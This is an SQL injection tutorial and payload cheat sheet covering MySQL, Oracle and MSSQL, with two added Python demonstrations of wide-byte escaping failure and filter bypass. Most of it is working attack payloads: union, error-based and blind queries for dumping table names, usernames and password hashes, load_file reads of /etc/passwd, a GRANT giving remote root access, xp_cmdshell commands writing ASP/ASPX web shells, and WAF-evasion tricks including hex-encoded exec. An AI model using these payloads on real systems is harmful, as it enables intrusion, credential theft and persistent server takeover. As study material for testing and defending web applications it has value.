SQL injection techniques are usually divided into three classes according to how the application handles what the database returns: displayed (union-based) injection, error-based injection and blind injection.

Displayed injection: the query result is rendered in the page, so the attacker reads the wanted data directly from the response, typically through a UNION SELECT.
Error-based injection: the query result is not shown, but the application prints database error messages to the page, so the attacker crafts a statement that forces an error whose message contains the wanted data.
Blind injection: neither results nor errors reach the page. The attacker infers data one character at a time, either from a true/false difference in the response (boolean-based) or from a deliberate delay the database is made to execute (time-based).
MySQL manual injection

?id=1' order by 4--+
?id=0' union select 1,2,3,database()--+
?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--+
?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users"--+
(group_concat(column_name) can be replaced with unhex(hex(cast(column_name as char))) when group_concat or quotes are filtered)
?id=0' union select 1,2,3,group_concat(password) from users--+
(group_concat can be replaced with concat_ws(',',id,username,password))
?id=0' union select 1,2,3,password from users limit 0,1--+

Notes: --+ becomes the "-- " comment once the + is URL-decoded to a space; id=0 (a non-existent row) is used so that the UNION row is the one the page displays.
Error-based injection

The idea is to place a subquery inside a function whose error message echoes its argument, so the value appears in the error text the application prints. All examples below leak user(); any scalar subquery can be substituted.

1. floor(): the classic duplicate-key error from rand(0) combined with group by
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2. extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
3. updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
6. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
7. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
8. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
9. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
10. exp(): the out-of-range error repeats the expression
select * from test where id=1 and exp(~(select * from(select user())a));

Caveats: extractvalue() and updatexml() (MySQL 5.1+) are the most portable, but the XPath error message is truncated to 32 characters, so page through long values with substr()/mid() or limit. The spatial-function vectors (4-9) and the exp() overflow (10) depend on the server version and have been fixed in newer releases. 0x7e ('~') is only a delimiter: it makes the leaked value easy to spot and guarantees the XPath expression is invalid.

updatexml() walkthrough (the examples assume a database named security with a users table):
Dump databases: ?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) --+
Dump tables: ?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) --+
Dump columns: ?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) --+
(0x7573657273 is 'users' as a hex literal, which avoids quotes)
Dump data: ?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) --+
concat() can also wrap the subquery from the outside: updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)
Increase the offset in "limit N,1" to walk through the rows one at a time.

Blind injection
Time-based blind injection
Commonly used function: sleep()
String-slicing functions: substr, substring, left
Encoding the extracted character with ascii() or hex() removes the need for quotes in the comparison.
Blind injection generally also needs a conditional function: if(expr1, expr2, expr3) returns expr2 when expr1 is true and expr3 otherwise.
?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+
?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+
Note which branch carries the delay: in the first payload the response is slow when the condition is false, in the second when it is true. Use a delay comfortably above the normal response time and repeat slow results, because network jitter produces false positives.
Boolean-based blind injection
?id=1' and substr((select user()),1,1)='r' --+
?id=1' and IFNULL((substr((select user()),1,1)='r'),0) --+
(IFNULL(a,b) returns b when a is NULL and a otherwise)
?id=1' and strcmp((substr((select user()),1,1)='r'),1) --+
(STRCMP returns 0 when both strings are equal, -1 when the first sorts before the second under the current collation, and 1 otherwise; here a correct guess gives strcmp(1,1)=0, so the normal page appears when the guess is wrong)

Injection in insert, delete and update statements
This kind of injection shows up wherever user data is written: registration forms, IP or User-Agent headers that get logged, message boards. Testing it with sqlmap produces a lot of junk rows, so prefer manual checks.
Try inserting a single quote, a double quote or an escape character (\) so that the statement cannot execute normally; if the insert or the update fails on that character, test further to confirm the injection.
Second-order injection and wide-byte injection
Second-order injection:
The payload is stored first by a query that escapes it correctly (for example a username containing a quote) and fires later, when the stored value is read back and concatenated into another SQL statement without escaping. Where such a payload must avoid single quotes, a hex literal (0x...) can stand in for the quoted string.
Wide-byte injection:
Escaping turns a single quote into \'. If the connection character set is a multi-byte one such as GBK, in which two bytes form one Chinese character, prepending the byte %df to the quote gives %df%5c%27: MySQL reads %df%5c as the single character 運 (the page's "luck" character), and the quote that follows is no longer escaped.
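As an added example (not from the original article), the escaping and decoding steps described above, simulated in Python so the effect can be checked without a MySQL server. addslashes() and build_query() are constructed stand-ins for the PHP application; the decode step models how the server interprets the same bytes under the connection character set.

```python
# Added example: why backslash escaping fails under a multi-byte connection
# charset such as GBK. The application functions below are constructed stand-ins.

def addslashes(s: bytes) -> bytes:
    """PHP-style addslashes(): backslash-escape ' " \\ and NUL, byte by byte.
    It has no idea which charset the database will use to read the bytes."""
    out = bytearray()
    for b in s:
        if b in b"'\"\\\x00":
            out.append(0x5C)          # prepend a backslash
        out.append(b)
    return bytes(out)


PREFIX = b"SELECT * FROM users WHERE name='"


def build_query(user_input: bytes) -> bytes:
    """Vulnerable pattern: escaped input concatenated into the SQL text as raw bytes."""
    return PREFIX + addslashes(user_input) + b"'"


def quote_survives(user_input: bytes, charset: str) -> bool:
    """Decode the query the way the server would under `charset` and report
    whether an unescaped quote is left inside the string literal."""
    text = build_query(user_input).decode(charset)
    inner = text[len(PREFIX.decode("ascii")):-1]   # the literal between the quotes
    i = 0
    while i < len(inner):
        if inner[i] == "\\":       # an escaped character: skip it and what it escapes
            i += 2
            continue
        if inner[i] == "'":        # a bare quote: the literal has been broken out of
            return True
        i += 1
    return False


def wide_char(lead: int, charset: str = "gbk") -> str:
    """What the lead byte plus the escaping backslash (0x5C) decodes to."""
    return bytes([lead, 0x5C]).decode(charset)


if __name__ == "__main__":
    payload = b"\xdf' or 1=1 -- "          # %df%27 ... as sent by the attacker
    print(build_query(payload))              # bytes: ... \xdf \x5c \x27 ...
    print("single-byte charset, quote escaped :", quote_survives(payload, "latin-1"))
    print("GBK connection, quote survives     :", quote_survives(payload, "gbk"))
    print("0xDF 0x5C decodes to", wide_char(0xDF))
```

The fix is to make the escaping routine charset-aware (mysql_set_charset()/mysqli_set_charset() instead of a plain addslashes()) or, better, to bind parameters so the input never becomes SQL text at all.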
Oracle manual injection
Union injection
?id=-1' union select user,null from dual--
?id=-1' union select version,null from v$instance--
?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--
?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name='USERS') where limit=2)--
?id=-1' union select username,passwd from users--
?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--
Notes: Oracle has no LIMIT, so rownum aliased inside a subquery selects the n-th row; every UNION branch needs the same number of columns with compatible types (null is a convenient filler); names in the data dictionary are upper-case ('USERS'); Oracle's -- comment does not require a trailing space.
Error-based injection (uses ctxsys.drithsx.sn from Oracle Text, which must be installed and executable by the application's database user)
?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%'))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name='USERS') where limit=3))--
?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--
Boolean-based blind injection
?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--
?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--
?id=1' and ascii(substr(user,1,1))>64--
(decode(expr, search, result, default) returns 1 when the value matches and 0 otherwise, so the condition is true only for a correct guess)
Time-based blind injection
?id=1' and 1=(case when ascii(substr(user,1,1))>128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
?id=1' and 1=(case when ascii(substr(user,1,1))>64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
DBMS_PIPE.RECEIVE_MESSAGE('a',5) blocks for 5 seconds waiting on pipe 'a'. The first payload (>128 is never true for an ASCII letter) serves as the no-delay control; the second should be slow.
MySQL manual injection, step by step (union / displayed-field method)
Step 1: confirm that the injection point exists
Numeric parameter: append
and 1=1
and 1=2
to the URL. If the two responses differ, the parameter is injectable.
Example:
http://www.xxx.cn/news.php?p=1&id=4'  returns an error
http://www.xxx.cn/news.php?p=1&id=4 and 1=1  returns normally
http://www.xxx.cn/news.php?p=1&id=4 and 1=2  returns an error (or an empty page)
String parameter: the value sits inside quotes, so close the quote and re-balance it at the end instead of commenting:
' and 1=1 and '1'='1
' and 1=2 and '1'='1
http://www.xxx.cn/news.php?p=1&id=4'  returns an error
http://www.xxx.cn/news.php?p=1&id=4' and 1=1 and '1'='1  returns normally
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 and '1'='1  returns an error
Search parameter (LIKE '%...%'): enter the following in the search box:
'  returns an error
x%' and 1=1 and '%'='  returns normally
x%' and 1=2 and '%'='  returns an error
(Compare the whole response, not only the status code: the "different" page is often an empty result set rather than an error.)
Step 2: count the columns with ORDER BY
ORDER BY n succeeds while n is at most the number of selected columns and fails once it is larger.
Numeric:
http://www.xxx.cn/news.php?p=1&id=4 order by 26  returns normally
http://www.xxx.cn/news.php?p=1&id=4 order by 27  returns an error
Conclusion: 26 columns.
String:
http://www.xxx.cn/news.php?p=1&id=4' order by 26 #  returns normally
http://www.xxx.cn/news.php?p=1&id=4' order by 27 #  returns an error
Conclusion: 26 columns. (The # comments out the application's closing quote; send it URL-encoded as %23, since a literal # starts the URL fragment and never reaches the server.)
Search:
x%' order by 26 #  returns normally
x%' order by 27 #  returns an error
Conclusion: 26 columns.
Step 3: find the displayed columns
"and 1=2" suppresses the genuine row, so the UNION row is what the page renders; the numbers that appear on the page identify the displayable columns.
Numeric:
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,3,4,5,6,7,8,9,....
String:
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,3,4,5,6,7,8,9,....
Search:
x%' and 1=2 union select 1,2,3,4,5,6,7,8,9,....
(Continue the list up to the column count found in step 2. The examples below assume that column 2 or 3 is displayed.)
Step 4: current database name
Numeric:
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,2,database(),4,5,6,7,8,9,....
String:
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,2,database(),4,5,6,7,8,9,....
Search:
x%' and 1=2 union select 1,2,database(),4,5,6,7,8,9,....
Step 5: tables in the database
Numeric:
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='database name'
String:
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables where table_schema='database name'
Search:
x%' and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8,9,.... from information_schema.tables where table_schema='database name'
The database name can also be given as a hex literal (0x...) to avoid quotes.
Step 6: columns of a table
Numeric:
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='table name'
String:
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.columns where table_name='table name'
Search:
x%' and 1=2 union select 1,2,group_concat(column_name),4,5,6,7,8,9,.... from information_schema.columns where table_name='table name'
The table name can also be given as a hex literal. Add "and table_schema=database()" when the same table name exists in several schemas.
Step 7: data in the table
Numeric:
http://www.xxx.cn/news.php?p=1&id=4 and 1=2 union select 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from table name
String:
http://www.xxx.cn/news.php?p=1&id=4' and 1=2 union select 1,group_concat(username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from table name
Search:
x%' and 1=2 union select 1,2,group_concat(username,password),4,5,6,7,8,9,.... from table name
(Use a separator, e.g. group_concat(username,0x3a,password), and remember that group_concat output is capped by group_concat_max_len, 1024 bytes by default.)
Useful MySQL statements
Version: select version();
Character set: select @@character_set_database;
Databases: show databases;
Tables: show tables;
(show statements cannot be embedded in a UNION; inside an injection use information_schema instead)
Host name: select @@hostname;
Operating system: select @@version_compile_os;
MySQL installation path: select @@basedir;
Data directory: select @@datadir;
Password hashes: select User,Password from mysql.user;  (from MySQL 5.7 the column is authentication_string; reading mysql.user requires a privileged account)
Allow remote connections: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;  (MySQL 8 no longer accepts IDENTIFIED BY inside GRANT; run CREATE USER first)
MySQL function utilization
MySQL's load_file() reads a file from the database server. The path must be absolute, the file must be readable by the mysqld process, the account needs the FILE privilege, and from MySQL 5.7 the secure_file_priv setting restricts the readable directory (or forbids file access entirely when set to NULL).
The SQL statement:
union select 1,load_file('/etc/passwd'),3,4,5
Many anti-injection filters reject single quotes, so pass the path as a hex literal instead:
union select 1,load_file(0x2F6574632F706173737764),3,4,5
(0x2F6574632F706173737764 is the hex encoding of /etc/passwd. Do not include the quotes in the hex, otherwise load_file() looks for a file literally named '/etc/passwd'.)
MSSQL manual injection
Unlike the MySQL walkthrough above, which reads data back through displayed UNION columns, the MSSQL approach below is error-based: a crafted expression forces a type-conversion error, and the error message SQL Server returns contains the value we are after.
Injection point:
www.xxx.cn/xxx/xxx.aspx?id=1
Database version
@@version is a global variable holding the version string.
Test statement:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and @@version>0
("and @@version>0" can also be written "and 0/@@version>0")
Error message:
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (SP3) - 10.50.6000.34 (X64) Aug 19 2014 12:21:34 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1' to data type int.
Why it works: comparing @@version with the integer 0 makes SQL Server implicitly convert the nvarchar value to int; the conversion fails and the error message echoes the value that could not be converted.
Computer name: @@servername. Error message: Failed to convert nvarchar value 'WINDOWS-XXXXXX' to data type int.
Current database: db_name(). Error message: Failed to convert nvarchar value 'abc' to data type int.
Current user: User_Name(). Error message: Failed to convert nvarchar value 'dbo' to data type int. Seeing dbo means the login owns the current database (db_owner); such logins are very often also sysadmin.
Other databases:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases)>0
Error message: Failed while converting nvarchar value 'master' to data type int.
Exclude the names already seen to walk through the list:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master'))>0
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('master','abc'))>0
Tables in database abc:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 name from abc.sys.all_objects where type='U' AND is_ms_shipped=0)>0
Error message: Failed to convert nvarchar value 'depart' to data type int.
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 name from abc.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('depart'))>0
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 name from abc.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('depart','worker'))>0
Columns of table depart:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 COLUMN_NAME from abc.information_schema.columns where TABLE_NAME='depart')>0
Error message: Failed to convert nvarchar value 'ID' to data type int.
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 COLUMN_NAME from abc.information_schema.columns where TABLE_NAME='depart' and COLUMN_NAME not in ('ID'))>0
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 COLUMN_NAME from abc.information_schema.columns where TABLE_NAME='depart' and COLUMN_NAME not in ('ID','NAME'))>0
Data:
http://www.xxx.cn/xxx/xxx.aspx?id=1 and (select top 1 password from depart)>0
Error message: Failed to convert nvarchar value 'B5A1EF8730200F93E50F4F5DEBBCAC0B' to data type int.
Writing a one-line web shell: if the login is sysadmin (xp_cmdshell requires it, and the procedure is disabled by default until enabled with sp_configure) and the absolute path of the web root is known:
asp: http://www.xxx.cn/xxx/xxx.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--
aspx: http://www.xxx.cn/xxx/xxx.aspx?id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=Jscript %>;<%eval(Request("sb"),"unsafe")%>''" >C:\inetpub\wwwroot\2.aspx' --
Principle: SQL Server supports stacked queries, so a ";exec master..xp_cmdshell '...'" appended to the injected statement runs a cmd command, and cmd's "echo content > file" writes the file to disk.
Hex encoding to get past a WAF: for an injection point such as http://www.xxx.com/xxx/xxx.aspx?username=xxx, use Encoding > HEX Encoding in Firefox's HackBar to turn the statement into a hex literal, then execute it through the error-based injection as shown next.
select convert(int,@@version)
After hex encoding: 0x73656c65637420636f6e7665727428696e742c404076657273696f6e29
Inject it like this:
http://www.xxx.com/xxx/xxx.aspx?username=xxx';dEcLaRe @s vArChAr(8000) sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 eXeC(@s)--
Error message: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor)' to data type int.
What the injected statement does:
dEcLaRe @s vArChAr(8000)  declares a local variable @s of type varchar(8000)
sEt @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29  assigns it the hex literal, which SQL Server implicitly converts to the string "select convert(int,@@version)"
eXeC(@s)  executes the contents of @s
The keywords are written in mixed case so that a case-sensitive keyword filter does not match, and the hex literal hides the actual statement from signature matching.
The same wrapper works for every earlier step; hex-encode one of these instead (abc stands for the database name, CMS_Userinfo for the table name):
select convert(int,db_name())
select convert(int,User_Name())
select convert(int,(select top 1 name from abc.sys.all_objects where type='U' AND is_ms_shipped=0))
select convert(int,(select top 1 name from abc.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('CMS_ArticleClass')))
select convert(int,(select top 1 COLUMN_NAME from abc.information_schema.columns where TABLE_NAME='CMS_Userinfo'))
select convert(int,(select top 1 COLUMN_NAME from abc.information_schema.columns where TABLE_NAME='CMS_Userinfo' and COLUMN_NAME not in ('id')))
select convert(int,(select top 1 username from CMS_Admin))
select convert(int,(select top 1 password from CMS_Admin))

SQL injection Q&A tips
1. id=12-1: if the page returns the record for id 11, the database evaluated the expression, so the parameter is injectable. Does id=12+1 work? Not as typed (www.test.com/xsn.php?id=12+1), because + in a URL decodes to a space; send it as %2B.
2. How many comment styles does MySQL have? Three: # comments to the end of the line; /* ... */ comments across several lines; -- comments to the end of the line. The third one needs explanation: it is a double dash followed by a space. A trailing space typed into the URL is dropped by the browser and never reaches the database, which is why payloads write it as --+ (the + decodes to a space).
3. Can "select select * from admin" be executed? No. A nested select must be parenthesized, otherwise the statement is invalid.
4. If spaces are filtered, what replaces them? Any character the parser treats as whitespace, or a comment. If "select * from messages where uid=45 or 1=1" collapses to "uid=45or1=1", use /**/ instead: http://www.xxx.com/index.php?id=45/**/or/**/1=1. Comments with arbitrary content such as /*|--|*/, /*@--|*/ or /*?--|*/ work as well. The keyword itself must stay contiguous: "un ion" is not union.
5. Under what account does Oracle run on Windows? Oracle on Windows runs with SYSTEM privileges.
6. SQL injection versus blind SQL injection: in regular injection the application returns database data to you; in blind injection you only get two different responses for a true and a false condition and never the query result itself.
7. Main cause of SQL injection: web applications that do not adequately validate user-supplied data and build statements from it (and do not encode output).
8. What is a stacked query? Several statements executed in sequence over one connection, e.g. SELECT * FROM members; DROP TABLE members;. Whether stacking is possible strongly affects exploitability: MySQL itself supports it, but the PHP API in use may not (mysql_query() sends a single statement, mysqli_multi_query() allows several).
9. What does /*! ... */ mean? A MySQL conditional comment: when the comment starts with ! and a version number, its content is executed as code if the server version is at least that number. select 1 /*!40119 +1*/ returns 2 on MySQL 4.1.19 or later and 1 otherwise.
10. If = is filtered, use like: union select password from users where username like 'admin';
11. If spaces are filtered, use /**/: union/**/select/**/password/**/from/**/users/**/where/**/username/**/like/**/'admin'. Splitting a keyword itself with a comment (uni/**/on, sel/**/ect) does not work in MySQL, because the tokenizer ends the keyword at the comment; against keyword filters use /*!union*/ inline comments, case changes or double-writing instead.
12. What about + in injection? MSSQL: + is both string concatenation and addition: '1'+'1'='11', 1+1=2. MySQL: + is addition only: '1'+'1'=2, 1+1=2. Oracle: + is addition only: '1'+'1'=2, 1+1=2.
13. String concatenation: MSSQL 'a'+'b'='ab'; MySQL 'a' 'b'='ab' (adjacent literals concatenate; concat('a','b') also works); Oracle 'a'||'b'='ab'.
14. Comment symbols: MSSQL '-- ' (note the space) and '/*...*/'; MySQL '-- ', '#', '/*...*/', with one or more spaces required after --; Oracle '-- ', '/*...*/'. '-- ' is common to all three.

WAF bypass
Rule-level bypass
SQL comment bypass: union/**/select, union/*aaaa bbs*/select, union/*aaaaaaaaaaaaaaaaaaaaaaaaaaa*/select; inline comments: /*!xxxx*/
Whitespace bypass: MySQL treats %09,%0A,%0B,%0C,%0D,%20,%A0 and any /*...*/ comment as whitespace, while a regex \s typically matches only %09,%0A,%0B,%0D,%20, so %0C and %A0 slip past signature rules. Example: union%0Cselect, union%A0select
Function separators: concat%20(, concat/**/(, concat%0c(, concat%a0(
Floating-point lexing: a numeric or NULL literal may be followed directly by a keyword without a space:
select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0
Error-based injection functions are easy for rule authors to overlook (see the error-based section above).
MySQL special syntax: select{x table_name}from{x information_schema.tables};  (the ODBC {identifier expr} escape)
Fuzzing, using comment bypass as the example: first test the basic form, union/**/select; then special characters inside the comment, union/*aaaa%01bbs*/select; finally the comment length, union/*aaaaaaaaaaaaaaaaaaaaaaa*/select. Basic pattern: union/*something*/select
Case bypass: a filter that matches a keyword as a literal string without normalising case (for example a filter on "and") only spots the exact spelling and does nothing to the keyword otherwise, so changing the case of some letters (And, aNd) bypasses it.
Double-write bypass: if the filter replaces a keyword with the empty string in a single pass (union removed regardless of case), writing uniunionon leaves union behind after the replacement, because only one replacement is made.
Encoding bypass: an online URL encoder such as http://tool.chinaz.com/Tools/urlencode.aspx helps build encoded payloads.
In MySQL, the content of a /*! */ conditional comment is executed as SQL.
MySQL characteristics: 1. keywords are case-insensitive; 2. hex literals are decoded by the server (URL encoding is decoded by the web server before the query is built); 3. and can be written as &&, or as ||; 4. inline comments /*! */ and multi-line comments /* */ are both allowed.
Bypass strategies: 1. case changes: or, OR, oR, Or, and, And, AND, aND. 2. comments around the keyword the filter expects (a/**/and) or double-writing (oorr). 3. symbol substitution: and -> &&, or -> ||. 4. encoding: hex, URL encoding. 5. URL-encoded whitespace: %0a (new line), %0c (form feed), %0d (carriage return), %0b (vertical tab).
sqlmap with these tricks: sqlmap -u "URL" --hex --dbs --batch, combined with %0a, /**/, union/select case changes, double-writing and similar transformations.
The above is the detailed content of "What are the types of SQL injection?". For more information, please follow other related articles on the PHP Chinese website.
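An added example, not from the original article, tying together the bypass techniques above (case change, comment and whitespace substitution, double-writing) and the hex-encoded declare/exec wrapper from the MSSQL section. Two constructed filters model the rule types the text describes: a case-sensitive signature that expects "union" + whitespace + "select", and a sanitizer that deletes each keyword in a single pass. An in-memory SQLite table is the constructed stand-in for the database, so %A0, which only MySQL treats as whitespace, is deliberately left out; the MSSQL wrapper is produced as a string and not executed.

```python
# Added example: which payload variants survive which filter, and what the
# database parser still accepts. All data and filters are constructed.
import re
import sqlite3

DB = sqlite3.connect(":memory:")
DB.executescript("CREATE TABLE users(id INTEGER, username TEXT, password TEXT);"
                 "INSERT INTO users VALUES (1, 'admin', 's3cr3t');")


def leaks(id_param: str) -> bool:
    """Run the vulnerable query and report whether the password reached the result."""
    try:
        rows = DB.execute("SELECT id, username FROM users WHERE id=" + id_param).fetchall()
    except sqlite3.Error:
        return False                       # syntax error: nothing leaked
    return any("s3cr3t" in str(r) for r in rows)


def rule_blocks(payload: str) -> bool:
    """Case-sensitive signature 'union<whitespace>select', using only the
    characters the text lists as regex whitespace (no form feed, no 0xA0)."""
    return re.search(r"union[\x09\x0a\x0b\x0d\x20]+select", payload) is not None


def strip_once(payload: str) -> str:
    """Sanitizer that deletes each keyword in a single, case-insensitive pass
    (the filter the double-write technique targets)."""
    for kw in ("union", "select"):
        payload = re.sub(kw, "", payload, flags=re.I)
    return payload


def mutations(base: str = "0 union select 1,password from users") -> dict:
    """Variants from the text applied to one union payload."""
    return {
        "plain": base,
        "case": base.replace("union", "UnIoN").replace("select", "SeLeCt"),
        "comment": base.replace("union select", "union/**/select"),
        "formfeed": base.replace("union select", "union\x0cselect"),   # %0C
        "newline": base.replace("union select", "union\nselect"),      # %0A
        "double_write": base.replace("union", "uniunionon").replace("select", "selselectect"),
    }


def evaluate() -> dict:
    """For every variant: does it pass the regex rule, does the database execute
    it as sent, and does it execute after the single-pass sanitizer has run?"""
    report = {}
    for name, p in mutations().items():
        report[name] = {
            "passes_regex_rule": not rule_blocks(p),
            "executes_raw": leaks(p),
            "executes_after_strip": leaks(strip_once(p)),
        }
    return report


def mssql_hex_wrapper(statement: str) -> str:
    """The declare/set/exec wrapper from the MSSQL section, with the statement
    as a hex literal so no keyword of it appears in the request."""
    hexed = "0x" + statement.encode("ascii").hex()
    return f"';dEcLaRe @s vArChAr(8000) sEt @s={hexed} eXeC(@s)--"


if __name__ == "__main__":
    for name, result in evaluate().items():
        print(f"{name:13} {result}")
    print(mssql_hex_wrapper("select convert(int,@@version)"))
```

Read the report row by row: the double-written payload is the only one that is a syntax error as sent but becomes a valid UNION SELECT after the sanitizer "cleans" it, while the form-feed and comment variants never match the whitespace signature yet are perfectly valid to the parser. A filter has to decide against what the database will accept, not against a regex's idea of a space.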